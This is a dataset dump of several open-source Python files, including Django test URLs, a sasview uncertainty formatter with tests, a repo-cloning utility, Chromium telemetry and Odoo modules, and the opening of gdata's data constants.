repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
AltSchool/django | tests/messages_tests/urls.py | 56 | 2556 | from django import forms
from django.conf.urls import url
from django.contrib import messages
from django.contrib.messages.views import SuccessMessageMixin
from django.http import HttpResponse, HttpResponseRedirect
from django.template import engines
from django.template.response import TemplateResponse
from django.urls import reverse
from django.views.decorators.cache import never_cache
from django.views.generic.edit import FormView
TEMPLATE = """{% if messages %}
<ul class="messages">
{% for message in messages %}
<li{% if message.tags %} class="{{ message.tags }}"{% endif %}>
{{ message }}
</li>
{% endfor %}
</ul>
{% endif %}
"""
@never_cache
def add(request, message_type):
# don't default to False here, because we want to test that it defaults
# to False if unspecified
fail_silently = request.POST.get('fail_silently', None)
for msg in request.POST.getlist('messages'):
if fail_silently is not None:
getattr(messages, message_type)(request, msg,
fail_silently=fail_silently)
else:
getattr(messages, message_type)(request, msg)
show_url = reverse('show_message')
return HttpResponseRedirect(show_url)
@never_cache
def add_template_response(request, message_type):
for msg in request.POST.getlist('messages'):
getattr(messages, message_type)(request, msg)
show_url = reverse('show_template_response')
return HttpResponseRedirect(show_url)
@never_cache
def show(request):
template = engines['django'].from_string(TEMPLATE)
return HttpResponse(template.render(request=request))
@never_cache
def show_template_response(request):
template = engines['django'].from_string(TEMPLATE)
return TemplateResponse(request, template)
class ContactForm(forms.Form):
name = forms.CharField(required=True)
slug = forms.SlugField(required=True)
class ContactFormViewWithMsg(SuccessMessageMixin, FormView):
form_class = ContactForm
success_url = show
success_message = "%(name)s was created successfully"
urlpatterns = [
url('^add/(debug|info|success|warning|error)/$', add, name='add_message'),
url('^add/msg/$', ContactFormViewWithMsg.as_view(), name='add_success_msg'),
url('^show/$', show, name='show_message'),
url('^template_response/add/(debug|info|success|warning|error)/$',
add_template_response, name='add_template_response'),
url('^template_response/show/$', show_template_response, name='show_template_response'),
]
| bsd-3-clause |
timthelion/FreeCAD_sf_master | src/3rdParty/Pivy-0.5/gui/__init__.py | 38 | 1587 | ###
# Copyright (C) 2002-2005, Tamer Fahmy <tamer@tammura.at>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
| lgpl-2.1 |
lewisodriscoll/sasview | src/sas/sascalc/data_util/formatnum.py | 3 | 18970 | # This program is public domain
# Author: Paul Kienzle
"""
Format values and uncertainties nicely for printing.
:func:`format_uncertainty_pm` produces the expanded format v +/- err.
:func:`format_uncertainty_compact` produces the compact format v(##),
where the number in parenthesis is the uncertainty in the last two digits of v.
:func:`format_uncertainty` uses the compact format by default, but this
can be changed to use the expanded +/- format by setting
format_uncertainty.compact to False.
The formatted string uses only the number of digits warranted by
the uncertainty in the measurement.
If the uncertainty is 0 or not otherwise provided, the simple
%g floating point format option is used.
Infinite and indefinite numbers are represented as inf and NaN.
Example::
>>> v,dv = 757.2356,0.01032
>>> print format_uncertainty_pm(v,dv)
757.236 +/- 0.010
>>> print format_uncertainty_compact(v,dv)
757.236(10)
>>> print format_uncertainty(v,dv)
757.236(10)
>>> format_uncertainty.compact = False
>>> print format_uncertainty(v,dv)
757.236 +/- 0.010
UncertaintyFormatter() returns a private formatter with its own
formatter.compact flag.
"""
from __future__ import division, print_function
import math
import numpy as np
__all__ = ['format_uncertainty', 'format_uncertainty_pm',
'format_uncertainty_compact']
# Coordinating scales across a set of numbers is not supported. For easy
# comparison a set of numbers should be shown in the same scale. One could
# force this from the outside by adding scale parameter (either 10**n, n, or
# a string representing the desired SI prefix) and having a separate routine
# which computes the scale given a set of values.
# Coordinating scales with units offers its own problems. Again, the user
# may want to force particular units. This can be done by outside of the
# formatting routines by scaling the numbers to the appropriate units then
# forcing them to print with scale 10**0. If this is a common operation,
# however, it may want to happen inside.
# The value e<n> is currently formatted into the number. Alternatively this
# scale factor could be returned so that the user can choose the appropriate
# SI prefix when printing the units. This gets tricky when talking about
# composite units such as 2.3e-3 m**2 -> 2300 mm**2, and with volumes
# such as 1 g/cm**3 -> 1 kg/L.
def format_uncertainty_pm(value, uncertainty):
"""
Given *value* v and *uncertainty* dv, return a string v +/- dv.
"""
return _format_uncertainty(value, uncertainty, compact=False)
def format_uncertainty_compact(value, uncertainty):
"""
Given *value* v and *uncertainty* dv, return the compact
representation v(##), where ## are the first two digits of
the uncertainty.
"""
return _format_uncertainty(value, uncertainty, compact=True)
class UncertaintyFormatter:
"""
Value and uncertainty formatter.
The *formatter* instance will use either the expanded v +/- dv form
or the compact v(##) form depending on whether *formatter.compact* is
True or False. The default is True.
"""
compact = True
def __call__(self, value, uncertainty):
"""
Given *value* and *uncertainty*, return a string representation.
"""
return _format_uncertainty(value, uncertainty, self.compact)
format_uncertainty = UncertaintyFormatter()
def _format_uncertainty(value, uncertainty, compact):
"""
Implementation of both the compact and the +/- formats.
"""
# Handle indefinite value
if np.isinf(value):
return "inf" if value > 0 else "-inf"
if np.isnan(value):
return "NaN"
# Handle indefinite uncertainty
if uncertainty is None or uncertainty <= 0 or np.isnan(uncertainty):
return "%g" % value
if np.isinf(uncertainty):
if compact:
return "%.2g(inf)" % value
else:
return "%.2g +/- inf" % value
# Handle zero and negative values
sign = "-" if value < 0 else ""
value = abs(value)
# Determine scale of value and error
err_place = int(math.floor(math.log10(uncertainty)))
if value == 0:
val_place = err_place - 1
else:
val_place = int(math.floor(math.log10(value)))
if err_place > val_place:
# Degenerate case: error bigger than value
# The mantissa is 0.#(##)e#, 0.0#(##)e# or 0.00#(##)e#
val_place = err_place + 2
elif err_place == val_place:
# Degenerate case: error and value the same order of magnitude
# The value is ##(##)e#, #.#(##)e# or 0.##(##)e#
val_place = err_place + 1
elif err_place <= 1 and val_place >= -3:
# Normal case: nice numbers and errors
# The value is ###.###(##)
val_place = 0
else:
# Extreme cases: zeros before value or after error
# The value is ###.###(##)e#, ##.####(##)e# or #.#####(##)e#
pass
# Force engineering notation, with exponent a multiple of 3
val_place = int(math.floor(val_place / 3.)) * 3
# Format the result
digits_after_decimal = abs(val_place - err_place + 1)
val_str = "%.*f" % (digits_after_decimal, value / 10.**val_place)
exp_str = "e%d" % val_place if val_place != 0 else ""
if compact:
err_str = "(%2d)" % int(uncertainty / 10.**(err_place - 1) + 0.5)
result = "".join((sign, val_str, err_str, exp_str))
else:
err_str = "%.*f" % (digits_after_decimal, uncertainty / 10.**val_place)
result = "".join((sign, val_str, exp_str + " +/- ", err_str, exp_str))
return result
def test_compact():
# Oops... renamed function after writing tests
value_str = format_uncertainty_compact
# val_place > err_place
assert value_str(1235670,766000) == "1.24(77)e6"
assert value_str(123567.,76600) == "124(77)e3"
assert value_str(12356.7,7660) == "12.4(77)e3"
assert value_str(1235.67,766) == "1.24(77)e3"
assert value_str(123.567,76.6) == "124(77)"
assert value_str(12.3567,7.66) == "12.4(77)"
assert value_str(1.23567,.766) == "1.24(77)"
assert value_str(.123567,.0766) == "0.124(77)"
assert value_str(.0123567,.00766) == "0.0124(77)"
assert value_str(.00123567,.000766) == "0.00124(77)"
assert value_str(.000123567,.0000766) == "124(77)e-6"
assert value_str(.0000123567,.00000766) == "12.4(77)e-6"
assert value_str(.00000123567,.000000766) == "1.24(77)e-6"
assert value_str(.000000123567,.0000000766) == "124(77)e-9"
assert value_str(.00000123567,.0000000766) == "1.236(77)e-6"
assert value_str(.0000123567,.0000000766) == "12.357(77)e-6"
assert value_str(.000123567,.0000000766) == "123.567(77)e-6"
assert value_str(.00123567,.000000766) == "0.00123567(77)"
assert value_str(.0123567,.00000766) == "0.0123567(77)"
assert value_str(.123567,.0000766) == "0.123567(77)"
assert value_str(1.23567,.000766) == "1.23567(77)"
assert value_str(12.3567,.00766) == "12.3567(77)"
assert value_str(123.567,.0764) == "123.567(76)"
assert value_str(1235.67,.764) == "1235.67(76)"
assert value_str(12356.7,7.64) == "12356.7(76)"
assert value_str(123567,76.4) == "123567(76)"
assert value_str(1235670,764) == "1.23567(76)e6"
assert value_str(12356700,764) == "12.35670(76)e6"
assert value_str(123567000,764) == "123.56700(76)e6"
assert value_str(123567000,7640) == "123.5670(76)e6"
assert value_str(1235670000,76400) == "1.235670(76)e9"
# val_place == err_place
assert value_str(123567,764000) == "0.12(76)e6"
assert value_str(12356.7,76400) == "12(76)e3"
assert value_str(1235.67,7640) == "1.2(76)e3"
assert value_str(123.567,764) == "0.12(76)e3"
assert value_str(12.3567,76.4) == "12(76)"
assert value_str(1.23567,7.64) == "1.2(76)"
assert value_str(.123567,.764) == "0.12(76)"
assert value_str(.0123567,.0764) == "12(76)e-3"
assert value_str(.00123567,.00764) == "1.2(76)e-3"
assert value_str(.000123567,.000764) == "0.12(76)e-3"
# val_place == err_place-1
assert value_str(123567,7640000) == "0.1(76)e6"
assert value_str(12356.7,764000) == "0.01(76)e6"
assert value_str(1235.67,76400) == "0.001(76)e6"
assert value_str(123.567,7640) == "0.1(76)e3"
assert value_str(12.3567,764) == "0.01(76)e3"
assert value_str(1.23567,76.4) == "0.001(76)e3"
assert value_str(.123567,7.64) == "0.1(76)"
assert value_str(.0123567,.764) == "0.01(76)"
assert value_str(.00123567,.0764) == "0.001(76)"
assert value_str(.000123567,.00764) == "0.1(76)e-3"
# val_place == err_place-2
assert value_str(12356700,7640000000) == "0.0(76)e9"
assert value_str(1235670,764000000) == "0.00(76)e9"
assert value_str(123567,76400000) == "0.000(76)e9"
assert value_str(12356,7640000) == "0.0(76)e6"
assert value_str(1235,764000) == "0.00(76)e6"
assert value_str(123,76400) == "0.000(76)e6"
assert value_str(12,7640) == "0.0(76)e3"
assert value_str(1,764) == "0.00(76)e3"
assert value_str(0.1,76.4) == "0.000(76)e3"
assert value_str(0.01,7.64) == "0.0(76)"
assert value_str(0.001,0.764) == "0.00(76)"
assert value_str(0.0001,0.0764) == "0.000(76)"
assert value_str(0.00001,0.00764) == "0.0(76)e-3"
# val_place == err_place-3
assert value_str(12356700,76400000000) == "0.000(76)e12"
assert value_str(1235670,7640000000) == "0.0(76)e9"
assert value_str(123567,764000000) == "0.00(76)e9"
assert value_str(12356,76400000) == "0.000(76)e9"
assert value_str(1235,7640000) == "0.0(76)e6"
assert value_str(123,764000) == "0.00(76)e6"
assert value_str(12,76400) == "0.000(76)e6"
assert value_str(1,7640) == "0.0(76)e3"
assert value_str(0.1,764) == "0.00(76)e3"
assert value_str(0.01,76.4) == "0.000(76)e3"
assert value_str(0.001,7.64) == "0.0(76)"
assert value_str(0.0001,0.764) == "0.00(76)"
assert value_str(0.00001,0.0764) == "0.000(76)"
assert value_str(0.000001,0.00764) == "0.0(76)e-3"
# Zero values
assert value_str(0,7640000) == "0.0(76)e6"
assert value_str(0, 764000) == "0.00(76)e6"
assert value_str(0, 76400) == "0.000(76)e6"
assert value_str(0, 7640) == "0.0(76)e3"
assert value_str(0, 764) == "0.00(76)e3"
assert value_str(0, 76.4) == "0.000(76)e3"
assert value_str(0, 7.64) == "0.0(76)"
assert value_str(0, 0.764) == "0.00(76)"
assert value_str(0, 0.0764) == "0.000(76)"
assert value_str(0, 0.00764) == "0.0(76)e-3"
assert value_str(0, 0.000764) == "0.00(76)e-3"
assert value_str(0, 0.0000764) == "0.000(76)e-3"
# negative values
assert value_str(-1235670,765000) == "-1.24(77)e6"
assert value_str(-1.23567,.766) == "-1.24(77)"
assert value_str(-.00000123567,.0000000766) == "-1.236(77)e-6"
assert value_str(-12356.7,7.64) == "-12356.7(76)"
assert value_str(-123.567,764) == "-0.12(76)e3"
assert value_str(-1235.67,76400) == "-0.001(76)e6"
assert value_str(-.000123567,.00764) == "-0.1(76)e-3"
assert value_str(-12356,7640000) == "-0.0(76)e6"
assert value_str(-12,76400) == "-0.000(76)e6"
assert value_str(-0.0001,0.764) == "-0.00(76)"
# non-finite values
assert value_str(-np.inf,None) == "-inf"
assert value_str(np.inf,None) == "inf"
assert value_str(np.NaN,None) == "NaN"
# bad or missing uncertainty
assert value_str(-1.23567,np.NaN) == "-1.23567"
assert value_str(-1.23567,-np.inf) == "-1.23567"
assert value_str(-1.23567,-0.1) == "-1.23567"
assert value_str(-1.23567,0) == "-1.23567"
assert value_str(-1.23567,None) == "-1.23567"
assert value_str(-1.23567,np.inf) == "-1.2(inf)"
def test_pm():
# Oops... renamed function after writing tests
value_str = format_uncertainty_pm
# val_place > err_place
assert value_str(1235670,766000) == "1.24e6 +/- 0.77e6"
assert value_str(123567., 76600) == "124e3 +/- 77e3"
assert value_str(12356.7, 7660) == "12.4e3 +/- 7.7e3"
assert value_str(1235.67, 766) == "1.24e3 +/- 0.77e3"
assert value_str(123.567, 76.6) == "124 +/- 77"
assert value_str(12.3567, 7.66) == "12.4 +/- 7.7"
assert value_str(1.23567, .766) == "1.24 +/- 0.77"
assert value_str(.123567, .0766) == "0.124 +/- 0.077"
assert value_str(.0123567, .00766) == "0.0124 +/- 0.0077"
assert value_str(.00123567, .000766) == "0.00124 +/- 0.00077"
assert value_str(.000123567, .0000766) == "124e-6 +/- 77e-6"
assert value_str(.0000123567, .00000766) == "12.4e-6 +/- 7.7e-6"
assert value_str(.00000123567, .000000766) == "1.24e-6 +/- 0.77e-6"
assert value_str(.000000123567,.0000000766) == "124e-9 +/- 77e-9"
assert value_str(.00000123567, .0000000766) == "1.236e-6 +/- 0.077e-6"
assert value_str(.0000123567, .0000000766) == "12.357e-6 +/- 0.077e-6"
assert value_str(.000123567, .0000000766) == "123.567e-6 +/- 0.077e-6"
assert value_str(.00123567, .000000766) == "0.00123567 +/- 0.00000077"
assert value_str(.0123567, .00000766) == "0.0123567 +/- 0.0000077"
assert value_str(.123567, .0000766) == "0.123567 +/- 0.000077"
assert value_str(1.23567, .000766) == "1.23567 +/- 0.00077"
assert value_str(12.3567, .00766) == "12.3567 +/- 0.0077"
assert value_str(123.567, .0764) == "123.567 +/- 0.076"
assert value_str(1235.67, .764) == "1235.67 +/- 0.76"
assert value_str(12356.7, 7.64) == "12356.7 +/- 7.6"
assert value_str(123567, 76.4) == "123567 +/- 76"
assert value_str(1235670, 764) == "1.23567e6 +/- 0.00076e6"
assert value_str(12356700, 764) == "12.35670e6 +/- 0.00076e6"
assert value_str(123567000, 764) == "123.56700e6 +/- 0.00076e6"
assert value_str(123567000,7640) == "123.5670e6 +/- 0.0076e6"
assert value_str(1235670000,76400) == "1.235670e9 +/- 0.000076e9"
# val_place == err_place
assert value_str(123567,764000) == "0.12e6 +/- 0.76e6"
assert value_str(12356.7,76400) == "12e3 +/- 76e3"
assert value_str(1235.67,7640) == "1.2e3 +/- 7.6e3"
assert value_str(123.567,764) == "0.12e3 +/- 0.76e3"
assert value_str(12.3567,76.4) == "12 +/- 76"
assert value_str(1.23567,7.64) == "1.2 +/- 7.6"
assert value_str(.123567,.764) == "0.12 +/- 0.76"
assert value_str(.0123567,.0764) == "12e-3 +/- 76e-3"
assert value_str(.00123567,.00764) == "1.2e-3 +/- 7.6e-3"
assert value_str(.000123567,.000764) == "0.12e-3 +/- 0.76e-3"
# val_place == err_place-1
assert value_str(123567,7640000) == "0.1e6 +/- 7.6e6"
assert value_str(12356.7,764000) == "0.01e6 +/- 0.76e6"
assert value_str(1235.67,76400) == "0.001e6 +/- 0.076e6"
assert value_str(123.567,7640) == "0.1e3 +/- 7.6e3"
assert value_str(12.3567,764) == "0.01e3 +/- 0.76e3"
assert value_str(1.23567,76.4) == "0.001e3 +/- 0.076e3"
assert value_str(.123567,7.64) == "0.1 +/- 7.6"
assert value_str(.0123567,.764) == "0.01 +/- 0.76"
assert value_str(.00123567,.0764) == "0.001 +/- 0.076"
assert value_str(.000123567,.00764) == "0.1e-3 +/- 7.6e-3"
# val_place == err_place-2
assert value_str(12356700,7640000000) == "0.0e9 +/- 7.6e9"
assert value_str(1235670,764000000) == "0.00e9 +/- 0.76e9"
assert value_str(123567,76400000) == "0.000e9 +/- 0.076e9"
assert value_str(12356,7640000) == "0.0e6 +/- 7.6e6"
assert value_str(1235,764000) == "0.00e6 +/- 0.76e6"
assert value_str(123,76400) == "0.000e6 +/- 0.076e6"
assert value_str(12,7640) == "0.0e3 +/- 7.6e3"
assert value_str(1,764) == "0.00e3 +/- 0.76e3"
assert value_str(0.1,76.4) == "0.000e3 +/- 0.076e3"
assert value_str(0.01,7.64) == "0.0 +/- 7.6"
assert value_str(0.001,0.764) == "0.00 +/- 0.76"
assert value_str(0.0001,0.0764) == "0.000 +/- 0.076"
assert value_str(0.00001,0.00764) == "0.0e-3 +/- 7.6e-3"
# val_place == err_place-3
assert value_str(12356700,76400000000) == "0.000e12 +/- 0.076e12"
assert value_str(1235670,7640000000) == "0.0e9 +/- 7.6e9"
assert value_str(123567,764000000) == "0.00e9 +/- 0.76e9"
assert value_str(12356,76400000) == "0.000e9 +/- 0.076e9"
assert value_str(1235,7640000) == "0.0e6 +/- 7.6e6"
assert value_str(123,764000) == "0.00e6 +/- 0.76e6"
assert value_str(12,76400) == "0.000e6 +/- 0.076e6"
assert value_str(1,7640) == "0.0e3 +/- 7.6e3"
assert value_str(0.1,764) == "0.00e3 +/- 0.76e3"
assert value_str(0.01,76.4) == "0.000e3 +/- 0.076e3"
assert value_str(0.001,7.64) == "0.0 +/- 7.6"
assert value_str(0.0001,0.764) == "0.00 +/- 0.76"
assert value_str(0.00001,0.0764) == "0.000 +/- 0.076"
assert value_str(0.000001,0.00764) == "0.0e-3 +/- 7.6e-3"
# Zero values
assert value_str(0,7640000) == "0.0e6 +/- 7.6e6"
assert value_str(0, 764000) == "0.00e6 +/- 0.76e6"
assert value_str(0, 76400) == "0.000e6 +/- 0.076e6"
assert value_str(0, 7640) == "0.0e3 +/- 7.6e3"
assert value_str(0, 764) == "0.00e3 +/- 0.76e3"
assert value_str(0, 76.4) == "0.000e3 +/- 0.076e3"
assert value_str(0, 7.64) == "0.0 +/- 7.6"
assert value_str(0, 0.764) == "0.00 +/- 0.76"
assert value_str(0, 0.0764) == "0.000 +/- 0.076"
assert value_str(0, 0.00764) == "0.0e-3 +/- 7.6e-3"
assert value_str(0, 0.000764) == "0.00e-3 +/- 0.76e-3"
assert value_str(0, 0.0000764) == "0.000e-3 +/- 0.076e-3"
# negative values
assert value_str(-1235670,766000) == "-1.24e6 +/- 0.77e6"
assert value_str(-1.23567,.766) == "-1.24 +/- 0.77"
assert value_str(-.00000123567,.0000000766) == "-1.236e-6 +/- 0.077e-6"
assert value_str(-12356.7,7.64) == "-12356.7 +/- 7.6"
assert value_str(-123.567,764) == "-0.12e3 +/- 0.76e3"
assert value_str(-1235.67,76400) == "-0.001e6 +/- 0.076e6"
assert value_str(-.000123567,.00764) == "-0.1e-3 +/- 7.6e-3"
assert value_str(-12356,7640000) == "-0.0e6 +/- 7.6e6"
assert value_str(-12,76400) == "-0.000e6 +/- 0.076e6"
assert value_str(-0.0001,0.764) == "-0.00 +/- 0.76"
# non-finite values
assert value_str(-np.inf,None) == "-inf"
assert value_str(np.inf,None) == "inf"
assert value_str(np.NaN,None) == "NaN"
# bad or missing uncertainty
assert value_str(-1.23567,np.NaN) == "-1.23567"
assert value_str(-1.23567,-np.inf) == "-1.23567"
assert value_str(-1.23567,-0.1) == "-1.23567"
assert value_str(-1.23567,0) == "-1.23567"
assert value_str(-1.23567,None) == "-1.23567"
assert value_str(-1.23567,np.inf) == "-1.2 +/- inf"
def test_default():
# Check that the default is the compact format
assert format_uncertainty(-1.23567,0.766) == "-1.24(77)"
def main():
"""
Run all tests.
This is equivalent to "nosetests --with-doctest"
"""
test_compact()
test_pm()
test_default()
import doctest
doctest.testmod()
if __name__ == "__main__": main()
| bsd-3-clause |
strycore/readthecode | codereader/util.py | 1 | 1064 | import os
import subprocess
from bzrlib.plugin import load_plugins
from bzrlib.branch import Branch
from git import Git
def autodetect_vcs(url):
if 'bitbucket' in url:
return 'hg'
if 'launchpad' in url:
return 'bzr'
if 'github' in url:
return 'git'
def clone_git_repo(url, local_path):
git_repo = Git(local_path)
git_repo.clone(url)
def clone_bzr_repo(url, local_path):
load_plugins()
bzr_repo = Branch.open(url)
bzr_repo.bzrdir.sprout(local_path).open_branch()
def clone_hg_repo(url, local_path):
subprocess.Popen(['hg', 'clone', url, local_path])
def clone_repo(url, local_path, vcs='git'):
clone_functions = {
'git': clone_git_repo,
'bzr': clone_bzr_repo,
'hg': clone_hg_repo,
}
if vcs == 'autodetect':
vcs = autodetect_vcs(url)
if vcs not in clone_functions:
raise ValueError('vcs argument must be one of %s',
' ,'.join(clone_functions))
os.makedirs(local_path)
clone_functions[vcs](url, local_path)
| agpl-3.0 |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/translations/model/hastranslationimports.py | 1 | 1245 | # Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Model code for `IHasTranslationImports."""
__metaclass__ = type
__all__ = [
'HasTranslationImportsMixin',
]
from zope.component import getUtility
from lp.translations.interfaces.translationimportqueue import (
ITranslationImportQueue,
)
class HasTranslationImportsMixin:
"""Helper class for implementing `IHasTranslationImports`."""
def getFirstEntryToImport(self):
"""See `IHasTranslationImports`."""
translation_import_queue = getUtility(ITranslationImportQueue)
return translation_import_queue.getFirstEntryToImport(target=self)
def getTranslationImportQueueEntries(self, import_status=None,
file_extension=None):
"""See `IHasTranslationImports`."""
if file_extension is None:
extensions = None
else:
extensions = [file_extension]
translation_import_queue = getUtility(ITranslationImportQueue)
return translation_import_queue.getAllEntries(
target=self, import_status=import_status,
file_extensions=extensions)
| agpl-3.0 |
s20121035/rk3288_android5.1_repo | external/chromium_org/tools/perf/page_sets/indexeddb_offline.py | 33 | 1888 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
def _CreateXpathFunction(xpath):
return ('document.evaluate("%s",'
'document,'
'null,'
'XPathResult.FIRST_ORDERED_NODE_TYPE,'
'null)'
'.singleNodeValue' % re.escape(xpath))
class IndexeddbOfflinePage(page_module.Page):
""" Why: Simulates user input while offline and sync while online. """
def __init__(self, page_set):
super(IndexeddbOfflinePage, self).__init__(
url='file://endure/indexeddb_app.html',
page_set=page_set,
name='indexeddb_offline')
self.user_agent_type = 'desktop'
def RunNavigateSteps(self, action_runner):
action_runner.NavigateToPage(self)
action_runner.WaitForElement(text='initialized')
def RunEndure(self, action_runner):
action_runner.WaitForElement('button[id="online"]:not(disabled)')
action_runner.ClickElement('button[id="online"]:not(disabled)')
action_runner.WaitForElement(
element_function=_CreateXpathFunction('id("state")[text()="online"]'))
action_runner.Wait(1)
action_runner.WaitForElement('button[id="offline"]:not(disabled)')
action_runner.ClickElement('button[id="offline"]:not(disabled)')
action_runner.WaitForElement(
element_function=_CreateXpathFunction('id("state")[text()="offline"]'))
class IndexeddbOfflinePageSet(page_set_module.PageSet):
""" Chrome Endure test for IndexedDB. """
def __init__(self):
super(IndexeddbOfflinePageSet, self).__init__(
user_agent_type='desktop')
self.AddPage(IndexeddbOfflinePage(self))
| gpl-3.0 |
alqfahad/odoo | addons/sale_analytic_plans/__init__.py | 443 | 1208 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#----------------------------------------------------------
# Init Sales
#----------------------------------------------------------
import sale_analytic_plans
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
aslamplr/shorts | gdata/data.py | 127 | 39947 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
"""Provides classes and constants for the XML in the Google Data namespace.
Documentation for the raw XML which these classes represent can be found here:
http://code.google.com/apis/gdata/docs/2.0/elements.html
"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import os
import atom.core
import atom.data
GDATA_TEMPLATE = '{http://schemas.google.com/g/2005}%s'
GD_TEMPLATE = GDATA_TEMPLATE
OPENSEARCH_TEMPLATE_V1 = '{http://a9.com/-/spec/opensearchrss/1.0/}%s'
OPENSEARCH_TEMPLATE_V2 = '{http://a9.com/-/spec/opensearch/1.1/}%s'
BATCH_TEMPLATE = '{http://schemas.google.com/gdata/batch}%s'
# Labels used in batch request entries to specify the desired CRUD operation.
BATCH_INSERT = 'insert'
BATCH_UPDATE = 'update'
BATCH_DELETE = 'delete'
BATCH_QUERY = 'query'
EVENT_LOCATION = 'http://schemas.google.com/g/2005#event'
ALTERNATE_LOCATION = 'http://schemas.google.com/g/2005#event.alternate'
PARKING_LOCATION = 'http://schemas.google.com/g/2005#event.parking'
CANCELED_EVENT = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT = 'http://schemas.google.com/g/2005#event.tentative'
CONFIDENTIAL_EVENT = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT = 'http://schemas.google.com/g/2005#event.public'
OPAQUE_EVENT = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_EVENT = 'http://schemas.google.com/g/2005#event.transparent'
CHAT_MESSAGE = 'http://schemas.google.com/g/2005#message.chat'
INBOX_MESSAGE = 'http://schemas.google.com/g/2005#message.inbox'
SENT_MESSAGE = 'http://schemas.google.com/g/2005#message.sent'
SPAM_MESSAGE = 'http://schemas.google.com/g/2005#message.spam'
STARRED_MESSAGE = 'http://schemas.google.com/g/2005#message.starred'
UNREAD_MESSAGE = 'http://schemas.google.com/g/2005#message.unread'
BCC_RECIPIENT = 'http://schemas.google.com/g/2005#message.bcc'
CC_RECIPIENT = 'http://schemas.google.com/g/2005#message.cc'
SENDER = 'http://schemas.google.com/g/2005#message.from'
REPLY_TO = 'http://schemas.google.com/g/2005#message.reply-to'
TO_RECIPIENT = 'http://schemas.google.com/g/2005#message.to'
ASSISTANT_REL = 'http://schemas.google.com/g/2005#assistant'
CALLBACK_REL = 'http://schemas.google.com/g/2005#callback'
CAR_REL = 'http://schemas.google.com/g/2005#car'
COMPANY_MAIN_REL = 'http://schemas.google.com/g/2005#company_main'
FAX_REL = 'http://schemas.google.com/g/2005#fax'
HOME_REL = 'http://schemas.google.com/g/2005#home'
HOME_FAX_REL = 'http://schemas.google.com/g/2005#home_fax'
ISDN_REL = 'http://schemas.google.com/g/2005#isdn'
MAIN_REL = 'http://schemas.google.com/g/2005#main'
MOBILE_REL = 'http://schemas.google.com/g/2005#mobile'
OTHER_REL = 'http://schemas.google.com/g/2005#other'
OTHER_FAX_REL = 'http://schemas.google.com/g/2005#other_fax'
PAGER_REL = 'http://schemas.google.com/g/2005#pager'
RADIO_REL = 'http://schemas.google.com/g/2005#radio'
TELEX_REL = 'http://schemas.google.com/g/2005#telex'
TTL_TDD_REL = 'http://schemas.google.com/g/2005#tty_tdd'
WORK_REL = 'http://schemas.google.com/g/2005#work'
WORK_FAX_REL = 'http://schemas.google.com/g/2005#work_fax'
WORK_MOBILE_REL = 'http://schemas.google.com/g/2005#work_mobile'
WORK_PAGER_REL = 'http://schemas.google.com/g/2005#work_pager'
NETMEETING_REL = 'http://schemas.google.com/g/2005#netmeeting'
OVERALL_REL = 'http://schemas.google.com/g/2005#overall'
PRICE_REL = 'http://schemas.google.com/g/2005#price'
